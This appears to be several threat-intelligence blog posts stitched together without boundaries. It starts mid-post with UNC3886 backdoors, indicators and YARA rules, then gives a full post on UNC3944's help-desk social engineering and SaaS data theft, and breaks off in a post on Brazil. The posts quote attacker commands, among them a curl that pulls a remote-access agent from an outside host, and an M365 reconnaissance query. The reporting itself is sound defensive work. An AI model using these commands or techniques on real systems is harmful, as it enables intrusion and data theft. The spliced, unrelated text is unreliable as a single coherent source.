The malicious version of /usr/bin/tac_plus was modified with a new function responsible for logging TACACS+ credentials to /var/log/tacu<unique_keyword>cs.log. The function was inserted in the verify() after the password was validated and in the passwd_file_verify(), which is responsible for confirming a credential after the password is confirmed to be correct. The captured credential record is XOR-ed with 0xEF before appending to the credential log file.

Figure 6: Malicious function within tac_plus for capturing credentials

Figure 7: Backdoored authentication function of tac_plus

The Family of VMCI Backdoors

Mandiant discovered a new variant of backdoors leveraging the Virtual Machine Communication Interface (VMCI) as a communication protocol. The VMCI backdoors could facilitate either guest-to-guest or host-to-guest communications to achieve command execution. See the overview of the attacker's use of ESXi Hypervisor VMCI communications for more information.

• VIRTUALSHINE is a simple VMware VMCI sockets-based backdoor that provides access to a bash shell. VIRTUALSHINE connects to a specified target, which streams the bash pty.
• VIRTUALPIE is a backdoor written in Python that spawns a demonized IPv6 listener on a hard-coded TCP port. It supports file transfer, arbitrary command execution, and reverse shell capabilities. It communicates using a custom protocol and the data is encrypted using RC4.
• VIRTUALSPHERE is the controller part of a simple VMCI-based backdoor. The malware transmits the second command-line argument over the VMCI socket to the server running inside the target VM.

We plan to release technical details of the VMCI backdoors in a future blog post.

Campaign 23-022 and Indicators of Compromise

Since March 2023, we have tracked UNC3886 activity leveraging zero-day exploits for Fortinet and VMware technologies as part of Campaign 23-022 in Mandiant Advantage for our customers. The majority of organizations that Mandiant has responded to or identified as targets through our own analysis have been located in the North America, Southeast Asia, or Oceania regions. However, we have also identified evidence of additional victims located in Europe, Africa, and other parts of Asia. Industries that Mandiant has observed being targeted are those typically observed in espionage operations, namely governments, telecommunications, technology, aerospace and defense, and energy and utility sectors. 

To assist the wider community in hunting and identifying activity outlined in this blog post, we have included a subset of these indicators of compromise (IOCs) in this post, and in a publicly available GTI Collection.

Host-Based Indicators

Filename

MD5

Family

Role

gl.py

381b7a2a6d581e3482c829bfb542a7de

 

UTILITY

install-20220615.py

876787f76867ecf654019bd19409c5b8

 

INSTALLER

lsuv2_nv.v01

827d8ae502e3a4d56e6c3a238ba855a7

 

ARCHIVE

payload1.v00

9ea86dccd5bbde47f8641b62a1eeff07

 

ARCHIVE

rdt

fcb742b507e3c074da5524d1a7c80f7f

 

ARCHIVE

sendPacket.py

129ba90886c5f5eb0c81d901ad10c622

 

UTILITY

sendPacket.py

0f76936e237bd87dfa2378106099a673

 

UTILITY

u.py

d18a5f1e8c321472a31c27f4985834a4

 

UTILITY

vmware_ntp.sh

4ddca39b05103aeb075ebb0e03522064

 

LAUNCHER

wp

0e43a0f747a60855209b311d727a20bf

GHOSTTOWN

UTILITY

aububbaditd

1d89b48548ea1ddf0337741ebdb89d92

LOOKOVER

SNIFFER

bubba_sniffer

ecb34a068eeb2548c0cbe2de00e53ed2

LOOKOVER

SNIFFER

ksbubba

89339821cdf6e9297000f3e6949f0404

MOPSLED.LINUX

BACKDOOR

ksbubba.service

c870ea6a598c12218e6ac36d791032b5

MOPSLED.LINUX

LAUNCHER

99-bubba.rules

1079d416e093ba40aa9e95a4c2a5b61f

REPTILE

LAUNCHER

admin

ed9be20fea9203f4c4557c66c5b9686c

REPTILE

BACKDOOR

authd

568074d60dd4759e963adc5fe9f15eb1

REPTILE

BACKDOOR

bubba

4d5e4f64a9b56067704a977ed89aa641

REPTILE

LAUNCHER

bubba_icmp

1b7aee68f384e252286559abc32e6dd1

REPTILE

BACKDOOR

bubba_loader

b754237c7b5e9461389a6d960156db1e

REPTILE

BACKDOOR

client

f41ad99b8a8c95e4132e850b3663cb40

REPTILE

BACKDOOR

dash

48f9bbdb670f89fce9c51ad433b4f200

REPTILE

LAUNCHER

listener

4fb72d580241f27945ec187855efd84a

REPTILE

BACKDOOR

packet

e2cdf2a3380d0197aa11ff98a34cc59e

REPTILE

CONTROLLER

authdd

fd3834d566a993c549a13a52d843a4e1

REPTILE.SHELL

BACKDOOR

authdd

4282de95cc54829d7ac275e436e33b78

REPTILE.SHELL

BACKDOOR

bubba_reverse

c9c00c627015bd78fda22fa28fd11cd7

REPTILE.SHELL

BACKDOOR

unknown

047ac6aebe0fe80f9f09c5c548233407

REPTILE.SHELL

BACKDOOR

usbubbaxd

bca2ccff0596a9f102550976750e2a89

RIFLESPINE

BACKDOOR

audit

3a8a60416b7b0e1aa5d17eefb0a45a16

TINYSHELL

CONTROLLER

lang_ext

6e248f5424810ea67212f1f2e4616aa5

TINYSHELL

BACKDOOR

sync

5d232b72378754f7a6433f93e6380737

TINYSHELL

CONTROLLER

x64

3c7316012cba3bbfa8a95d7277cda873

VIRTUALGATE

DROPPER

ndc4961

9c428a35d9fc1fdaf31af186ff6eec08

VIRTUALPEER

UTILITY

lsu_lsi_.v05

2716c60c28cf7f7568f55ac33313468b

VIRTUALPIE

ARCHIVE

vmsyslog.py

61ab3f6401d60ec36cd3ac980a8deb75

VIRTUALPIE

BACKDOOR

vmware_local.sh

bd6e38b6ff85ab02c1a4325e8af29ce4

VIRTUALPIE

LAUNCHER

cleanupStatefulHost.sh

9ef5266a9fdd25474227c3e33b8e6d77

VIRTUALPITA

LAUNCHER

client

a7cd7b61d13256f5478feb28ab34be72

VIRTUALPITA

BACKDOOR

duci

cd3e9e4df7e607f4fe83873b9d1142e3

VIRTUALPITA

BACKDOOR

payload1

62bed88bd426f91ddbbbcfcd8508ed6a

VIRTUALPITA

ARCHIVE

rdt

8e80b40b1298f022c7f3a96599806c43

VIRTUALPITA

BACKDOOR

rhttpproxy

c9f2476bf8db102fea7310abadeb9e01

VIRTUALPITA

BACKDOOR

rhttpproxy-IO

2c28ec2d541f555b2838099ca849f965

VIRTUALPITA

BACKDOOR

rpci

2bade2a5ec166d3a226761f78711ce2f

VIRTUALPITA

BACKDOOR

ssh

969d7f092ed05c72f27eef5f2c8158d6

VIRTUALPITA

BACKDOOR

nds4961l.so

084132b20ed65b2930129b156b99f5b3

VIRTUALSHINE

BACKDOOR

Network-Based Indicators

IPv4

ASN

Netblock

8.222.218.20

45102

Alibaba

8.222.216.144

45102

Alibaba

8.219.131.77

45102

Alibaba

8.219.0.112

45102

Alibaba

8.210.75.218

45102

Alibaba

8.210.103.134

45102

Alibaba

47.252.54.82

45102

Alibaba

47.251.46.35

45102

Alibaba

47.246.68.13

45102

Alibaba

47.243.116.155

45102

Alibaba

47.241.56.157

45102

Alibaba

45.77.106.183

20473

Choopa, LLC

45.32.252.98

20473

Choopa, LLC

207.246.64.38

20473

Choopa, LLC

149.28.122.119

20473

Choopa, LLC

155.138.161.47

20473

Gigabit Hosting Sdn Bhd

154.216.2.149

55720

Gigabit Hosting Sdn Bhd

103.232.86.217

55720

Gigabit Hosting Sdn Bhd

103.232.86.210

55720

Gigabit Hosting Sdn Bhd

103.232.86.209

55720

Gigabit Hosting Sdn Bhd

58.64.204.165

17444

HKBN Enterprise Solutions Limited

58.64.204.142

17444

HKBN Enterprise Solutions Limited

58.64.204.139

17444

HKBN Enterprise Solutions Limited

165.154.7.145

135377

Ucloud Information Technology Hk Limited

165.154.135.108

135377

Ucloud Information Technology Hk Limited

165.154.134.40

135377

Ucloud Information Technology Hk Limited

152.32.231.251

135377

Ucloud Information Technology Hk Limited

152.32.205.208

135377

Ucloud Information Technology Hk Limited

152.32.144.15

135377

Ucloud Information Technology Hk Limited

152.32.129.162

135377

Ucloud Information Technology Hk Limited

123.58.207.86

135377

Ucloud Information Technology Hk Limited

123.58.196.34

135377

Ucloud Information Technology Hk Limited

118.193.63.40

135377

Ucloud Information Technology Hk Limited

118.193.61.71

135377

Ucloud Information Technology Hk Limited

118.193.61.178

135377

Ucloud Information Technology Hk Limited

YARA Rules rule M_Sniffer_LOOKOVER_1 { meta: author = "Mandiant" strings: $str1 = "TKEY" $str2 = "FILTER" $str3 = "DEVICE" $str4 = "SNFILENAME" $str5 = "/var/lib/libsyslog.so" $code = {8B 55 F8 48 8B 45 E8 48 01 C2 8B 45 FC 48 8D 0C 85 00 00 00 00 48 8B 45 E0 48 01 C8 8B 00 88 02 8B 45 F8 83 C0 01 89 C2 48 8B 45 E8 48 01 C2 8B 45 FC 48 8D 0C 85 00 00 00 00 48 8B 45 E0 48 01 C8 8B 00 C1 E8 08 88 02 8B 45 F8 83 C0 02 89 C2 48 8B 45 E8 48 01 C2 8B 45 FC 48 8D 0C 85 00 00 00 00 48 8B 45 E0 48 01 C8 8B 00 C1 E8 10 88 02 8B 45 F8 83 C0 03 89 C2 48 8B 45 E8 48 01 C2 8B 45 FC 48 8D 0C 85 00 00 00 00 48 8B 45 E0 48 01 C8 8B 00 C1 E8 18 88 02 83 45 FC 01 83 45 F8 04} condition: uint32(0) == 0x464c457f and filesize < 5MB and all of them } rule M_Utility_GHOSTTOWN_1 { meta: author = "Mandiant" strings: $code1 = { 2F 76 61 72 2F 6C 6F 67 } $code2 = { 2F 76 61 72 2F 72 75 6E } $debug1 = "=== results ===" ascii $debug2 = "=== %s ===" ascii $debug3 = "searching record in file %s" ascii $debug4 = "record not matched, not modifing %s" ascii $debug5 = "delete %d records in %s" ascii $debug6 = "NEVER_LOGIN" ascii $debug7 = "you need to specify a username to clear" ascii $pattern1 = "%-10s%-10s%-10s%-20s%-10s" ascii $pattern2 = "%-15s%-10s%-15s%-10s" ascii condition: uint32(0) == 0x464C457F and all of them } rule M_Utility_VIRTUALPEER_1 { meta: author = "Mandiant" strings: $vmci_socket_family = {B? 00 00 00 00 B? 02 00 00 00 B? 28 00 00 00 e8 [4-128] B? 00 00 00 00 48 8d [5] b? 00 00 00 00 e8 [4-64] B? 00 00 00 00 48 8d [5] b? 00 00 00 00 e8 [4-64] B? B8 07 00 00 [0-8] b? 00 00 00 00 e8} $vmci_socket_marker1 = "/dev/vsock" ascii wide $vmci_socket_marker2 = "/vmfs/devices/char/vsock/vsock" ascii wide $vmci_socket_init_bind_listen = {e8 [4] 89 45 [4-64] 8B 45 ?? b? 00 00 00 00 b? 01 00 00 00 [0-4] e8 [4-128] B? 10 00 00 00 [1-16] e8 [4-128] BE 01 00 00 00 [1-16] e8 [4] 83 F8 FF} $socket_read_write = {BA 01 00 00 00 48 89 CE 89 C7 E8 [4] 48 85 C0 [1-64] BA 01 00 00 00 48 89 CE 89 C7 E8 [4] 48 85 C0 7e ?? eb} $marker1 = "nc <port>" condition: uint32(0) == 0x464c457f and all of them } rule M_Hunting_VIRTUALPITA_1 { meta: author = "Mandiant" strings: $forpid = { 70 69 64 20 [0-10] 69 6E 20 60 [0-10] 70 73 20 2D [0-10] 63 20 7C 20 [0-10] 67 72 65 70 [0-10] 20 76 6D 73 [0-10] 79 73 6C 6F [0-10] 67 64 20 7C [0-10] 20 61 77 6B [0-10] 20 27 7B 20 [0-10] 70 72 69 6E [0-10] 74 20 24 31 [0-10] 20 7D 27 60 [0-10] 3B 20 64 6F [0-10] 20 6B 69 6C [0-10] 6C 20 2D 39 [0-10] 20 24 70 69 [0-10] 64 3B 20 64 [0-10] 6F 6E 65 00 } $vmsyslogd = { 2F 75 73 72 [0-10] 2F 6C 69 62 [0-10] 2F 76 6D 77 [0-10] 61 72 65 2F [0-10] 76 6D 73 79 [0-10] 73 6C 6F 67 [0-10] 2F 62 69 6E [0-10] 2F 76 6D 73 [0-10] 79 73 6C 6F [0-10] 67 64 00 00 } condition: uint32(0) == 0x464c457f and any of them } rule M_APT_Launcher_REPTILE_1 { meta: author = "Mandiant" strings: $str1 = {B8 00 00 00 00 E8 A1 FE FF FF 48 8B 85 40 FF FF FF 48 83 C0 08 48 8B 00 BE 00 00 00 00 48 89 C7 B8 00 00 00 00 E8 ?? FD FF FF 89 45 ?8 48 8D 95 50 FF FF FF 8B 45 ?8 48 89 D6 89 C7 E8 ?? 0? 00 00 48 8B 45 80 48 89 45 F0 48 8B 45 F0 48 89 C7 E8 ?? F? FF FF 48 89 45 ?8 48 8B 55 F0 48 8B 4D ?8 8B 45 ?8 48 89 CE 89 C7 E8 ?? FC FF FF 48 8B 55 F0 48 8B 45 ?8 B9 4? 0C 40 00 48 89 C6 BF AF 00 00 00 B8 00 00 00 00 E8 ?? FC FF FF E8 ?? FC FF FF 8B 00 83 F8 25 75 07 C7 45 ?C 00 00 00 00 } $str2 = {81 7D F? FF 03 00 00 7E E9 BE 02 00 00 00 BF ?? 0C 40 00 B8 00 00 00 00 E8 ?? F? FF FF 89 45 F? 8B 45 F? BE 01 00 00 00 89 C7 E8 ?? FD FF FF 8B 45 F? BE 02 00 00 00 89 C7 E8 ?? F? FF FF C9 C3} condition: uint32(0) == 0x464C457F and all of them } rule M_APT_Backdoor_VIRTUALSHINE_1 { meta: author = "Mandiant" strings: $str1 = "/dev/vsock" $str2 = "/vmfs/devices/char/vsock/vsock" $str3 = "nds4961l <cid> <vport>" $str4 = "[!] VMCISock_GetAFValue()." $str5 = "[+] Connected to server.[ %s:%s ]" $str6 = "TERM=xterm" $str7 = "PWD=/tmp/" condition: uint32(0) == 0x464C457F and all of them } rule M_APT_BACKDOOR_MOPSLED_1 { meta: author = "Mandiant" strings: $x = { e8 ?? ?? ?? ?? 85 c0 0f 85 ?? ?? ?? ?? 4? 8d ?? ?4 ?8 be ?? ?? ?? ?? e8 ?? ?? ?? ?? 84 c0 0f 84 ?? ?? ?? ?? 4? 8b 94 ?? ?? ?? ?? ?? 4? 8b 44 ?? ?? 4? 89 e1 [0-6] be ?? ?? ?? ?? b? ?? ?? ?? ?? 4? 89 10 8b 94 ?? ?? ?? ?? ?? [0-6] 89 50 08 4? 8b 54 ?? ?? c7 42 0c ?? ?? ?? ?? e8 ?? ?? ?? ?? } condition: uint32(0) == 0x464c457f and uint8(4) == 2 and filesize < 5MB and $x } rule M_APT_BACKDOOR_MOPSLED_1 { meta: author = "Mandiant" strings: $x = { e8 ?? ?? ?? ?? 85 c0 0f 85 ?? ?? ?? ?? 4? 8d ?? ?4 ?8 be ?? ?? ?? ?? e8 ?? ?? ?? ?? 84 c0 0f 84 ?? ?? ?? ?? 4? 8b 94 ?? ?? ?? ?? ?? 4? 8b 44 ?? ?? 4? 89 e1 [0-6] be ?? ?? ?? ?? b? ?? ?? ?? ?? 4? 89 10 8b 94 ?? ?? ?? ?? ?? [0-6] 89 50 08 4? 8b 54 ?? ?? c7 42 0c ?? ?? ?? ?? e8 ?? ?? ?? ?? } condition: uint32(0) == 0x464c457f and uint8(4) == 2 and filesize < 5MB and $x }

Introduction

UNC3944 is a financially motivated threat group that carries significant overlap with public reporting of "0ktapus," "Octo Tempest," "Scatter Swine," and "Scattered Spider" and has been observed adapting its tactics to include data theft from software-as-a-service (SaaS) applications to attacker-owned cloud storage objects (using cloud synchronization tools), persistence mechanisms against virtualization platforms, and lateral movement via SaaS permissions abuse. Active since at least May 2022, UNC3944 has leveraged underground communities like Telegram to acquire tools, services, and support to enhance their operations.

Initially, UNC3944 focused on credential harvesting and SIM swapping attacks in their operations, eventually migrating to ransomware and data theft extortion; however recently UNC3944 has shifted to primarily data theft extortion, without the use of ransomware. This change in objectives has precipitated an expansion of targeted industries and organizations as evidenced by Mandiant investigations. 

Evidence also suggests UNC3944 has occasionally resorted to fearmongering tactics to gain access to victim credentials. These tactics include threats of doxxing personal information, physical harm to victims and their families, and the distribution of compromising material.

This blog post aims to spotlight UNC3944's attacks against SaaS applications observed over the past 10 months, providing insights into the group's evolving TTPs in line with its shifting mission objectives.

Tactics, Techniques, and Procedures (TTPs)

Figure 1: UNC3944 attack lifecycle

Mandiant has observed UNC3944 in multiple engagements leveraging social engineering techniques against corporate help desks to gain initial access to existing privileged accounts. Mandiant has analyzed several forensic recordings of these call center attacks, and of the observed recordings Mandiant noted the threat actors spoke with clear English and targeted accounts with high privilege potential. Additionally, it has been noted that they already possessed the personally identifiable information (PII) of its victims to bypass help desk administrators' user identity verification. Mandiant observed use of verification information, such as the last four digits of Social Security numbers, dates of birth, and manager names and job titles with associated co-workers. The level of sophistication in these social engineering attacks is evident in both the extensive research performed on potential victims and the high success rate in said attacks.

UNC3944 operators employed consistent social engineering tactics across various victims, often calling service desks to claim they were receiving a new phone, warranting a multi-factor authentication (MFA) reset. By interacting with service desk administrators, UNC3944 could not only reset passwords for privileged accounts but also bypass associated MFA protections. The social engineering techniques went beyond the call centers as extensive SMS phishing campaigns were also observed. 

After successfully gaining initial access to victim environments, UNC3944 conducted internal reconnaissance of Microsoft applications, such as SharePoint, to enumerate remote connection requirements. UNC3944 frequently targeted internal help guides and documentation for virtual private networks (VPNs), virtual desktop infrastructure (VDIs), and remote telework utilities that were available on its victims' SharePoint sites. UNC3944 abused existing legitimate third-party tooling for remote access to compromised environments.

UNC3944 has also leveraged Okta permissions abuse techniques through the self-assignment of a compromised account to every application in an Okta instance to expand the scope of intrusion beyond on-premises infrastructure to Cloud and SaaS applications. With this privilege escalation, the threat actor could not only abuse applications that leverage Okta for single sign-on (SSO), but also conduct internal reconnaissance through use of the Okta web portal by visually observing what application tiles were available after these role assignments.

Virtual Machine Compromise

An aspect of these intrusions involves a more aggressive method of persistence occurring through the creation of new virtual machines. In several instances, Mandiant observed UNC3944 access vSphere and Azure, using single sign-on applications, to create new virtual machines from which they conducted all follow-on activities. The importance here is the observation of abusing administrative groups or normal administrator permissions tied through SSO applications to then create this method of persistence.

Mandiant observed publicly available utilities such as MAS_AIO and privacy-script.bat to reconfigure the newly created virtual machine to deactivate various policies deemed contrary to privacy. This generally involved removing default Microsoft Defender protections as well as certain Windows telemetry that normally aids a forensic investigation. Additionally, a lack of endpoint monitoring allowed the group to download tools such as Mimikatz, ADRecon, and various covert tunneling tools, such as NGROK, RSOCX, and Localtonet. The use of these tools allowed UNC3944 access to the device without the need to use VPN or MFA. Other tooling included the installation of Python libraries, such as IMPACKET.

Tracking further activity from this device proves tedious when pivoting to cloud investigations. Due to the nature of cloud setups, all further cloud access was sourced from inside the compromised environment, meaning normal indicators of compromise such as poor reputation IP addresses don't effectively differentiate normal activity from threat actor activity. Despite this, Mandiant noted traditional browser artifact forensics still proved useful for tracking application accesses.

To bypass authentication controls, Mandiant has observed the use of an optical disc image file (ISO) called PCUnlocker. By attaching this ISO to existing virtual machines through the vCenter appliance, UNC3944 reset local administrator passwords allowing the bypass of normal domain controls. This ISO requires restarting and changing BIOS settings to boot into this mountable image to effectively subvert domain controls. Monitoring of virtual machine uptime or even brief impacts would allow for potential detection opportunities.

Additionally, in the past investigations, Mandiant has observed UNC3944 deploying ALPHV ransomware against the Virtual Machine File Systems, on the ESXI hypervisors themselves, to cause destructive actions inside of an environment. As a by-product of this activity, the attacker's deployed virtual machines were usually encrypted and evidence of activities within the network was destroyed. Since early 2024 Mandiant has not observed ransomware deployment by this threat group, however the potential to destroy or remove evidence is still a capability they leverage. 

Despite anti forensic measures, evidence showed that observed activity in victim environments was primarily aimed at discovering key infrastructure and potential exfiltration targets, such as databases and web content. Once located, data exfiltration occurred through these virtual machines to various high-reputation resources such as Google Cloud Platform (GCP) and Amazon Web Services (AWS).

Pivot to SaaS Applications

In addition to traditional on-premises activity, Mandiant observed pivots into client SaaS applications. UNC3944 used stolen credentials to access SaaS applications protected by single sign-on providers. Mandiant observed unauthorized access to such applications as vCenter, CyberArk, SalesForce, Azure, CrowdStrike, AWS, and GCP. Figure 2 provides an excerpt from a single Okta SSO log entry from 2023 associated with this activity.

{ "timestamp": "[redacted], "user": "[redacted]", "account": "redacted<>@corp.<redacted_domain>.com", "source_ip": "96.242.13.152", "service": "Crowdstrike Falcon", "sso_provider": "OKTA", "geoip_city": "[redacted]", "geoip_country_code": "US", "geoip_country_name": "United States", "geoip_organization": "Verizon Fios", "geoip_region": "NJ", "source_json": ... "client": { "userAgent": { "rawUserAgent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0", "os": "Windows 10", "browser": "FIREFOX" }, "zone": "null", "device": "Computer", "id": null, "ipAddress": "96.242.13.152", ..., "displayMessage": "User single sign on to app", "eventType": "user.authentication.sso", "outcome": { "result": "SUCCESS", "reason": null }, "published": "[redacted]", ... "severity": "INFO", "debugContext": { "debugData": { "audience": "https://falcon.us-2.crowdstrike.com/saml/ metadata", "subject": "<redacted_username>@<redacted_domain>.com", "signOnMode": "SAML 2.0", "authenticationClassRef": "urn:oasis:names:tc:SAML:2.0: ac:classes:PasswordProtectedTransport", "authTime": "[redacted]", "requestUri": "/app/<redacted_domain>_crowdstrikefalcon_1/ [redacted]/sso/saml", "issuer": "http://www.okta.com/[redacted]", "url": "/app/<redacted_domain>_crowdstrikefalcon_1//sso/ saml?", "initiationType": "IDP_INITIATED", "authnRequestId": "[redacted]", "requestId": "[redacted]", "dtHash": "2f91954af8b8c55fa21b2de175ef84173abf820a7da3 ef1a1b0abac9cce777dc", "expiryTime": "[redacted]", "issuedAt": "[redacted]", "jti": "[redacted]" ...

Figure 2: Okta SSO log excerpt from an event in 2023

Mandiant observed the use of endpoint detection and response tooling to further test access to the environment. One such example was the creation of API keys inside of CrowdStrike's external console, which allowed the threat actor to execute commands within the Real Time Response (RTR) module such as whoami and quser. Figure 3 contains several events associated with UNC3944 commands executed in the CrowdStrike Falcon Real-Time-Response (RTR) module of a victim environment. According to CrowdStrike, RTR is disabled by default for users and admins. CrowdStrike recommends organizations enable MFA for additional protections on RTR commands.

runscript -raw=```whoami``` -Timeout=```3600```runscript -raw= ```curl icanhazip.com``` -Timeout=```3600``` runscript -raw=```curl wtfismyip.org``` -Timeout=```3600``` runscript -raw=```curl wtfismyip.com``` -Timeout=```3600``` runscript -raw=```curl google.com``` -Timeout=```3600``` runscript -raw=```curl google.com``` -Timeout=```3600``` runscript -raw=```curl google.com -usebasicparsing``` -Timeout=```3600``` runscript -raw=```curl icanhazip.com -usebasicparsing``` -Timeout=```3600``` runscript -raw=```curl icanhazip.com -usebasicparsing``` -Timeout=```3600``` runscript -raw=```curl https://agent.fleetdeck.io/HiZGDaf5T3xTLZdBWUsG2Q?win

Figure 3: Commands executed via CrowdStrike Falcon RTR module

UNC3944 continued to access Azure, CyberArk, Salesforce, and Workday and within each of these applications conducted further reconnaissance.

Specifically for CyberArk, Mandiant has observed the download and use of the PowerShell module psPAS specifically to programmatically interact with an organization's CyberArk instance. This utility allows for faster enumeration of CyberArk vaults and makes further investigation more difficult, as without robust PowerShell logging, it is difficult to determine what commands were executed against a CyberArk instance.

After sufficient reconnaissance, Mandiant observed exfiltration from SaaS applications through cloud synchronization utilities, such as Airbyte and Fivetran, to move data from cloud-hosted data sources to external attacker-owned cloud storage resources, such as S3 buckets. These applications required only credentials and a path to the resources to sync the data to an external source automatically, often without the need for a subscription or expensive costs. Figure 4 contains an excerpt of Airbyte logs that Mandiant successfully acquired from an UNC3944 victim.

[redacted] destination > INFO a.m.s.StreamTransferManager (uploadStreamPart):558 [Manager uploading to prodbucket11 /salesforce/Account/[redacted].csv with id XXdIBNCrR...uvUswAXY-]: Finished uploading [Part number 18 containing 10.01 MB] [redacted] destination > INFO a.m.s.StreamTransferManager(complete): 395 [Manager uploading to prodbucket11/salesforce/Account /[redacted].csv with id XXdIBNCrR...uvUswAXY-]: Completed 2023-10-09 15:42:01 destination > INFO i.a.i.d.s.S3StorageOperations (loadDataIntoBucket):214 Uploaded buffer file to storage: [redacted].csv -> salesforce/Account/[redacted].csv (filename: [redacted].csv) [redacted] destination > INFO i.a.i.d.s.S3StorageOperations (uploadRecordsToBucket):131 Successfully loaded records to stage salesforce/Account/2023_10_09_1696844737410_ with 0 re-attempt(s) 2023-10-09 15:42:01 destination > INFO i.a.i.d.r.FileBuffer(deleteFile): 109 Deleting tempFile data [redacted].csv [redacted] destination > INFO i.a.i.d.r.SerializedBufferingStrategy (flushSingleBuffer):128 Flushing completed for Account [redacted] destination > INFO i.a.i.d.r.SerializedBufferingStrategy (lambda$getOrCreateBuffer$0):109 Starting a new buffer for stream Account (current state: -14332 bytes in 0 buffers) [redacted] replication-orchestrator > Records read: 3635000 (18 GB)

Figure 4: Excerpt of Airbyte logs associated with data theft activity

ADFS Targeting

Mandiant has observed UNC3944 targeting Active Directory Federated Services (ADFS), when in use, specifically to export the ADFS certificates. With these certificates and through the use of a Golden SAML attack, easier and persistent access to cloud-based applications can occur. Correlating events on the ADFS to the service provider sign-in logs can assist with the detection of forged SAML tokens.

Dangers of SaaS Application Access

This current attack path highlights, in addition to traditional dangers of sensitive data storage, the dangers of storing data in SaaS-hosted applications. These risks are often overlooked as part of internal security due to traditional SaaS models offloading some risk to the application owner. As part of initial data reconnaissance, Mandiant has observed the use of advanced M365 capabilities, including Microsoft’s Office Delve, directly inside of an M365 tenant designed to highlight data sources that a compromised account could access.Delve allows users to quickly view and access files they have access to, whether it’s based on group membership or directly shared with a user. These personalized content recommendations include aggregated information from various sources within M365, such as files, emails, documents, and conversations. Delve also maps out organizational relationships, to include key members within the organization and the user’s direct management chain, and allows you to view recent documents associated with each member of your organization.

Although this is a useful feature for collaboration, UNC3944 has been observed leveraging this application for quick reconnaissance and datamining. Because these files are often sorted by most recent modified date, it also allows for quick identification of active projects, ongoing discussions, and the latest versions of potentially sensitive or confidential information.

"SearchQueryText: and(and(SharedWithUsersOwsUser:|<COMPROMISED.USER> @, ContentType:Document), and(not(HideFromDelve:"1"), not(OnHold:"1"), not(Path:"tag://public/?NAME=*"), not(Title:or(OneNote_DeletedPages, OneNote_RecycleBin)), not (SecondaryFileExtension:onetoc2), not(IsOneNotePage:"1"), not(IsInRecycleBin:"1"), not(ContentType:Folder), not(FileExtension:url), not(ContentClass:or(STS_ListItem_Categories*, STS_ListItem_852*, STS_List_DocumentLibrary*, STS_ListItem_GenericList*, STS_ListItem_544*, STS_ListItem_Tasks*, STS_Document*, STS_Site*)), not(ContentClass:"urn:content-class:SPSPeople*")))”

Figure 5: Example M365 Delve query

Mandiant has observed that these resources are generally excluded from security monitoring tools and have insufficient logging to record the full range of user activities. While SaaS applications such as Salesforce do not configure the logging verbosity based on the type of license a user has, the logging granularity is impacted by the configuration of debugging logs, the audit trail, and whether or not the add-on feature "Salesforce Shield" is enabled. 

Traditional on-premises security controls, such as firewalls and network flow sensors, are ineffective in detecting large outbound data transfers from SaaS platforms due to their networking configuration. This abstraction makes it difficult to identify data theft using traditional evidence sources like firewall and netflow logs. While historical analysis of SaaS and cloud logs can reveal data theft, real-time detection of this activity remains challenging.

Recommendations

Several courses of action can help to mitigate persistence or increased access in a targeted environment. Mandiant recommends utilizing both host-based certificates coupled with multi-factor authentication for any VPN access. Additionally, creating stricter conditional access policies to control what is visible inside of a cloud tenant can limit overall impact.

Multiple detection opportunities exist to assist with a speedier identification of possible compromise. Mandiant recommends heightened monitoring of SaaS applications, to include centralizing logs from important SaaS-based applications, MFA re-registrations, and virtual machine infrastructure, specifically about both uptime and the creation of new devices.

SaaS applications pose an interesting dilemma for organizations as there is a gray area of where and who should conduct monitoring to identify issues. For the applications where proprietary or guarded information exists, Mandiant recommends that an organization ensures they have a robust logging capability that their security teams can review for signs of malicious intent.

Written by: Kristen Dennesen, Luke McNamara, Dmitrij Lenz, Adam Weidemann, Aline Bueno

 

Note: A Portuguese-language version of this blog post is available.

Individuals and organizations in Brazil face a unique cyber threat landscape because it is a complex interplay of global and local threats, posing significant risks to individuals, organizations, and critical sectors of Brazilian society. Many of the cyber espionage threat actors that are prolific in campaigns across the globe are also active in carrying out attempted intrusions into critical sectors of Brazilian society. Brazil also faces threats posed by the worldwide increase in multifaceted extortion, as ransomware and data theft continue to rise. At the same time, the threat landscape in Brazil is shaped by a domestic cybercriminal market, where threat actors coordinate to carry out account takeovers, conduct carding and fraud, deploy banking malware and facilitate other cyber threats targeting Brazilians. The rise of the Global South, with Brazil at the forefront, marks a significant shift in the geopolitical landscape; one that extends into the cyber realm. As Brazil's influence grows, so does its digital footprint, making it an increasingly attractive target for cyber threats originating from both global and domestic actors.

This blog post brings together Google’s collective understanding of the Brazilian threat landscape, combining insights from Google’s Threat Analysis Group (TAG) and Mandiant’s frontline intelligence. As Brazil’s economic and geopolitical role in global affairs continues to rise, threat actors from an array of motivations will further seek opportunities to exploit the digital infrastructure that Brazilians rely upon across all aspects of society. By sharing our global perspective, we hope to enable greater resiliency in mitigating these threats.

Google uses the results of our research to improve the safety and security of our products, making them secure by default. Chrome OS has built-in and proactive security to protect from ransomware, and there have been no reported ransomware attacks ever on any business, education, or consumer Chrome OS device. Google security teams continuously monitor for new threat activity, and all identified websites and domains are added to Safe Browsing to protect users from further exploitation. We deploy and constantly update Android detections to protect users' devices and prevent malicious actors from publishing malware to the Google Play Store. We send targeted Gmail and Workspace users government-backed attacker alerts, notifying them of the activity and encouraging potential targets to enable Enhanced Safe Browsing for Chrome and ensure that all devices are updated.  

Cyber Espionage Operations Targeting Brazil

Brazil’s status as a globally influential power and the largest economy in South America have drawn attention from cyber espionage actors for several years, including targeting by government-backed groups from the People’s Republic of China (PRC), Russia, and North Korea.

Government-backed phishing activity targeting Brazil (2020 – Q1 2024)

Since 2020, cyber espionage groups from more than a dozen countries have targeted users in Brazil; however, more than 85% of government-backed phishing activity is concentrated among groups from the PRC, North Korea, and Russia. The Brazil-focused targeting of these groups mirrors the broader priorities and industry targeting trends we see elsewhere. North Korean government-backed groups, for example, have shown a keen interest in Brazilian cryptocurrency firms, aerospace and defense, and government targets. PRC groups, meanwhile, have targeted Brazilian government organizations, as well as the energy sector. Russian cyber espionage groups have targeted users in Brazil regularly dating back more than a decade; however since the start of Russia’s war in Ukraine, Russian activity targeting Brazil has scaled back considerably - likely an indication of Russia’s efforts to focus resources on Ukrainian and NATO targets in the context of the Russia-Ukraine war.

The examples here highlight recent and historical examples where cyber espionage actors have targeted users and organizations in Brazil. It should be noted that these campaigns describe targeting and do not indicate successful compromise or exploitation.

PRC Cyber Espionage Activity Targeting Brazil

